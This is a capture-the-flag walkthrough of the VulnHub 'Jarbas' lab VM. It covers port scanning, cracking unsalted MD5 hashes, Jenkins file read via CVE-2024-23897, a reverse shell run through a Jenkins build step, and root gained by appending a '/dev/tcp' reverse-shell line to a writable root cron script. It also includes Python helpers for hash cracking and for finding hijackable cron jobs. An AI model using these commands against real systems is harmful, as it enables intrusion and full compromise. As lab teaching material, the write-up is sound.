Target link
https://www.vulnhub.com/entry/jarbas-1,232/
Host discovery and port scanning
-
Scan the subnet for live hosts. The target was the last VM I added, so its address is 192.168.75.135. The other VMware-MAC entries are the VMware host-side interfaces, and 192.168.75.131 (reported without a MAC, as nmap does for the scanning host itself) is the attacking Kali box that the reverse shells later connect back to. -sP is a legacy alias for -sn (ping sweep, no port scan).
nmap -sP 192.168.75.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:03 CST
Nmap scan report for 192.168.75.1
Host is up (0.00032s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00036s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.135
Host is up (0.00032s latency).
MAC Address: 00:0C:29:08:91:76 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:F8:B3:1A (VMware)
Nmap scan report for 192.168.75.131
Host is up.
-
Scan all 65535 TCP ports on the host. Open ports: 22, 80, 3306, 8080.
nmap -sT --min-rate 10000 -p- 192.168.75.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:05 CST
Nmap scan report for 192.168.75.135
Host is up (0.00074s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:08:91:76 (VMware)
-
Scan service versions and the operating system on the open ports. The Apache banner already reveals CentOS with PHP 5.4.16, and port 8080 is a Jetty instance (Jenkins embeds Jetty).
nmap -sT -sV -O -p22,80,3306,8080 192.168.75.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:07 CST
Nmap scan report for 192.168.75.135
Host is up (0.00076s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:08:91:76 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
-
Run the default vuln scripts. Nothing of note turns up (TRACE being enabled on port 80 is low value here), but http-enum finds two paths: /icons/ on port 80 and /robots.txt on port 8080.
nmap --script=vuln -p22,80,3306,8080 192.168.75.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-21 14:08 CST
Nmap scan report for 192.168.75.135
Host is up (0.00032s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:08:91:76 (VMware)
Attack priority:
80 and 8080 (web, largest attack surface)
→ 3306 (MariaDB; it answers "unauthorized", so our host is not allowed to connect and it is only useful with credentials from elsewhere)
→ 22 (SSH; only useful once we hold credentials)
Web penetration
Port 80
-
Directory scan of http://192.168.75.135/
python .\dirsearch.py -u http://192.168.75.135/
[14:12:53] 200 -   359B - /access.html
[14:12:58] 403 -   210B - /cgi-bin/
-
/access.html is found. Visiting it gives useful information:
Creds encrypted in a safe way!
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
At first glance these look like MD5 (32 hex characters each). Despite the page's claim, unsalted MD5 is a hash, not encryption, and a wordlist cracks it in seconds. Cracking yields the following, presumably account passwords; where they are used is not yet known.
tiago:italia99
trindade:marianna
eder:vipsu
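As an added example (not part of the original walkthrough), here is the dictionary attack in Python instead of an online cracker. It parses the access.html lines and hashes each wordlist candidate exactly once, which tests every user at the same time precisely because the hashes carry no salt. The wordlist and the extra "demo" user (hash of "password") are constructed for the example; the three Jarbas lines are the ones shown above.

```python
import hashlib

# Constructed sample: the three lines from access.html on the target, plus a
# hypothetical "demo" user whose hash is md5("password"), so the wordlist hit
# can be verified offline.
ACCESS_HTML_CREDS = """\
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
demo:5f4dcc3b5aa765d61d8327deb882cf99
"""

# Tiny constructed wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "italia99", "marianna", "vipsu", "jenkins"]

HEX = set("0123456789abcdef")


def md5_hex(word):
    """Hex MD5 of a candidate password (the function the target used)."""
    return hashlib.md5(word.encode()).hexdigest()


def parse_creds(text):
    """Parse 'user:hexdigest' lines; skip anything that is not a 32-hex-char digest."""
    creds = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        user, digest = line.strip().split(":", 1)
        digest = digest.strip().lower()
        if len(digest) == 32 and set(digest) <= HEX:
            creds[user.strip()] = digest
    return creds


def crack_md5(creds, wordlist):
    """One pass over the wordlist cracks every user at once.

    With a salt each user would need its own pass; without one, a single
    md5(word) lookup serves all targets, which is why the page's
    'encrypted in a safe way' is wrong.
    """
    by_digest = {}
    for user, digest in creds.items():
        by_digest.setdefault(digest, []).append(user)
    found = {}
    for word in wordlist:
        for user in by_digest.get(md5_hex(word), []):
            found[user] = word
    return found


if __name__ == "__main__":
    for user, password in crack_md5(parse_creds(ACCESS_HTML_CREDS), WORDLIST).items():
        print(f"{user}:{password}")
```

For a real engagement swap WORDLIST for a file such as rockyou.txt read line by line; the lookup cost stays one hash per candidate regardless of how many users are in the file.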
-
Checking the icons directory found by nmap: nothing useful, it is Apache's default /icons/ alias with directory listing enabled.
Port 8080
-
Port 8080 serves a login page: it is Jenkins, the CI/automation server (not a CMS).
-
First look at the robots.txt that nmap found. Its content:
# we don't want robots to click "build" links
User-agent: *
Disallow: /
Nothing exploitable by itself, although the comment about robots clicking "build" links hints that build jobs can be triggered from the web UI, which matters later.
-
Back at the login page, try the credentials recovered from access.html.
eder:vipsu
logs in successfully.
-
Inside the dashboard, dig for useful functions: Jenkins CLI, the Script Console and System Information are all of interest.
Under About Jenkins, the version is 2.113.
Exploitation
-
Research shows this version is affected by the arbitrary file read CVE-2024-23897: the CLI's args4j argument parser expands an @file argument into the lines of that file, and the bug affects Jenkins 2.441 and earlier and LTS 2.426.2 and earlier. We try it, following this write-up:
https://blog.csdn.net/qq_34594929/article/details/136446671
-
Open Jenkins CLI from the dashboard and download jenkins-cli.jar.
-
Then go to Manage Jenkins → Configure Global Security → tick "Allow anonymous read access". This grants the unauthenticated CLI Overall/Read, which is what lets the bug return whole files rather than only the first lines. Note that this changes the target's security configuration; on a real engagement, authenticate with -auth eder:vipsu instead and leave the setting alone.
-
On Kali, run the following to read /etc/passwd. Every line of the file becomes a separate argument to connect-node, so each line comes back as a "No such agent ... exists." error; the lines are returned out of file order.
java -jar jenkins-cli.jar -s http://192.168.75.135:8080 connect-node '@/etc/passwd'
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin: No such agent "ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" exists.
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin: No such agent "systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin" exists.
daemon:x:2:2:daemon:/sbin:/sbin/nologin: No such agent "daemon:x:2:2:daemon:/sbin:/sbin/nologin" exists.
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin: No such agent "lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin" exists.
root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists.
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false: No such agent "jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false" exists.
adm:x:3:4:adm:/var/adm:/sbin/nologin: No such agent "adm:x:3:4:adm:/var/adm:/sbin/nologin" exists.
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown: No such agent "shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown" exists.
sync:x:5:0:sync:/sbin:/bin/sync: No such agent "sync:x:5:0:sync:/sbin:/bin/sync" exists.
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin: No such agent "mail:x:8:12:mail:/var/spool/mail:/sbin/nologin" exists.
dbus:x:81:81:System message bus:/:/sbin/nologin: No such agent "dbus:x:81:81:System message bus:/:/sbin/nologin" exists.
postfix:x:89:89::/var/spool/postfix:/sbin/nologin: No such agent "postfix:x:89:89::/var/spool/postfix:/sbin/nologin" exists.
operator:x:11:0:operator:/root:/sbin/nologin: No such agent "operator:x:11:0:operator:/root:/sbin/nologin" exists.
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash: No such agent "eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash" exists.
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin: No such agent "apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin" exists.
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin: No such agent "mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin" exists.
polkitd:x:999:997:User for polkitd:/:/sbin/nologin: No such agent "polkitd:x:999:997:User for polkitd:/:/sbin/nologin" exists.
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin: No such agent "sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin" exists.
halt:x:7:0:halt:/sbin:/sbin/halt: No such agent "halt:x:7:0:halt:/sbin:/sbin/halt" exists.
nobody:x:99:99:Nobody:/:/sbin/nologin: No such agent "nobody:x:99:99:Nobody:/:/sbin/nologin" exists.
games:x:12:100:games:/usr/games:/sbin/nologin: No such agent "games:x:12:100:games:/usr/games:/sbin/nologin" exists.
chrony:x:998:996::/var/lib/chrony:/sbin/nologin: No such agent "chrony:x:998:996::/var/lib/chrony:/sbin/nologin" exists.
bin:x:1:1:bin:/bin:/sbin/nologin: No such agent "bin:x:1:1:bin:/bin:/sbin/nologin" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
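Because the CLI hands back one error per file line, in no particular order, it helps to reassemble the file before reading it. The following Python is an added example, not code from the walkthrough: it extracts the quoted lines from a constructed fragment of the stderr above, orders the passwd entries by UID, and lists the accounts that have a real login shell, which are the ones worth trying for password reuse over SSH (the next step here).

```python
import re

# Constructed sample: a fragment of the jenkins-cli stderr shown above. The
# '@/etc/passwd' expansion returns each file line inside a "No such agent"
# error, and the order is not the file's order.
CLI_STDERR = '''Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin: No such agent "ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" exists.
root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists.
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false: No such agent "jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false" exists.
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash: No such agent "eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
'''

# The file line appears verbatim between the quotes of the error message.
AGENT_RE = re.compile(r'No such agent "(.*)" exists\.$')

# Shells that do not give an interactive login.
NOLOGIN = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
           "/bin/sync", "/sbin/halt", "/sbin/shutdown"}


def recover_lines(stderr_text):
    """Pull the quoted file lines back out of the 'No such agent' errors."""
    lines = []
    for raw in stderr_text.splitlines():
        m = AGENT_RE.search(raw)
        if m:
            lines.append(m.group(1))
    return lines


def passwd_entries(lines):
    """Parse passwd lines into dicts and sort by UID, restoring a readable order."""
    entries = []
    for line in lines:
        parts = line.split(":")
        if len(parts) != 7:          # not a passwd record; skip it
            continue
        name, _, uid, gid, gecos, home, shell = parts
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return sorted(entries, key=lambda e: e["uid"])


def interactive_users(entries):
    """Accounts with a real login shell: candidates for credential reuse over SSH."""
    return [e["name"] for e in entries if e["shell"] not in NOLOGIN]


if __name__ == "__main__":
    entries = passwd_entries(recover_lines(CLI_STDERR))
    for e in entries:
        print(f"{e['uid']:>5} {e['name']:<16} {e['shell']}")
    print("interactive:", interactive_users(entries))
```

In practice pipe the real CLI run into it (java -jar jenkins-cli.jar ... 2>&1 | python3 recover.py, reading sys.stdin instead of CLI_STDERR); the same regex works for any file read this way, only the passwd parsing is format specific.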
/etc/shadow cannot be read this way: it is readable only by root, and Jenkins does not run as root. /etc/passwd does show a local user eder with a real login shell, the same name as the Jenkins account, so we try SSH with the same credentials. The login fails, so we take another route.
Reverse shell from the Jenkins dashboard
-
New Item → Freestyle project: the Build section offers an "Execute shell" step that runs arbitrary shell commands on the Jenkins host, as the user Jenkins runs as.
-
Enter the reverse shell command as the build step and save the job.
-
Start a listener on Kali:
nc -lvp 1234
listening on [any] 1234 ...
-
Click Build Now in Jenkins; the build executes the command we entered.
-
Shell obtained. Upgrade it to an interactive PTY with python so that prompts and job control work:
nc -lvp 1234
listening on [any] 1234 ...
192.168.75.135: inverse host lookup failed: Unknown host
connect to [192.168.75.131] from (UNKNOWN) [192.168.75.135] 54884
python -c "import pty;pty.spawn('/bin/bash')"
bash-4.2$ ls
ls
bash-4.2$
Privilege escalation
-
Check what the shell obtained through Jenkins can do:
bash-4.2$ whoami
jenkins
bash-4.2$ sudo -l
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for jenkins: ^C
bash-4.2$ uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ls -l
total 0
bash-4.2$ dpkg -l
bash: dpkg: command not found
So we are the unprivileged jenkins service account: sudo wants a password we do not have, the box is CentOS 7 (el7 kernel 3.10.0-693), and dpkg is missing because this is an RPM-based system (rpm -qa is the equivalent here).
-
Check crontab for scheduled jobs that run as root:
bash-4.2$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
The script's content is:
bash-4.2$ cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
So there is a job that runs every five minutes as root and deletes the Apache access log.
-
If that script is writable by jenkins, we can append a reverse shell to it and let cron execute it as root. Start the listener on port 1235 first, since the job fires within five minutes, then append the one-liner; the echo succeeds, confirming the file is writable:
bash-4.2$ echo "/bin/bash >& /dev/tcp/192.168.75.131/1235 0>&1" >> /etc/script/CleaningScript.sh
Privilege escalation succeeds: we get a root shell and read the flag.
nc -lvp 1235
listening on [any] 1235 ...
192.168.75.135: inverse host lookup failed: Unknown host
connect to [192.168.75.131] from (UNKNOWN) [192.168.75.135] 58338
python -c "import pty;pty.spawn('/bin/bash')"
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[root@jarbas ~]# dpkg -l
dpkg -l
bash: dpkg: command not found
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey! Congratulations! You got it! I always knew you could do it! This challenge was very easy, huh? =) Thanks for appreciating this machine. @tiagotvrs
[root@jarbas ~]#
Afterwards, remove the appended line from CleaningScript.sh, otherwise root keeps calling back every five minutes.
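As an added example (not from the walkthrough), the privesc check above as a small Python enumeration script: it parses /etc/crontab, keeps only the root jobs, and reports any whose script, or the directory holding it, is writable by the current user; a writable directory counts because replacing the script is as good as editing it. The crontab text is the one shown above plus one constructed extra job; the writability check is injectable (os.access is the default) so the logic can be tested without touching the real filesystem. reverse_shell_line just renders the one-liner used above for the chosen listener.

```python
import os
import re

# Constructed sample: the /etc/crontab from the target (comment block trimmed)
# plus a hypothetical second root job whose script is not writable.
CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# m h dom mon dow user command
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
"""

ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_system_crontab(text):
    """Return (schedule, user, command) for each job line in /etc/crontab format.

    Skips blank lines, comments and VAR=value assignments. System crontabs
    (unlike per-user ones) carry a user field between the schedule and the command.
    """
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ASSIGNMENT_RE.match(line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return jobs


def writable_root_jobs(text, is_writable=None):
    """Root-run jobs the current user can hijack.

    is_writable(path) -> bool defaults to os.access(path, W_OK); inject a fake
    for testing. Relative commands resolve through cron's PATH and are skipped.
    """
    if is_writable is None:
        is_writable = lambda p: os.access(p, os.W_OK)
    hits = []
    for schedule, user, command in parse_system_crontab(text):
        if user != "root":
            continue
        path = command.split()[0]          # the file cron actually executes
        if not path.startswith("/"):
            continue
        if is_writable(path):
            hits.append((schedule, path, "script writable"))
        elif is_writable(os.path.dirname(path)):
            hits.append((schedule, path, "directory writable (script can be replaced)"))
    return hits


def reverse_shell_line(lhost, lport):
    """The bash one-liner appended to the writable script in the walkthrough."""
    return f"/bin/bash >& /dev/tcp/{lhost}/{lport} 0>&1"


if __name__ == "__main__":
    try:
        text = open("/etc/crontab").read()   # the real file when run on a target
    except OSError:
        text = CRONTAB                       # fall back to the constructed sample
    for schedule, path, why in writable_root_jobs(text):
        print(f"[{schedule}] {path}: {why}")
        print("  append:", reverse_shell_line("192.168.75.131", 1235))
```

The same two checks (file writable, parent directory writable) apply to /etc/cron.d/* and the /etc/cron.{hourly,daily,weekly,monthly} directories, which run as root too; only the line format of /etc/cron.d matches what parse_system_crontab expects.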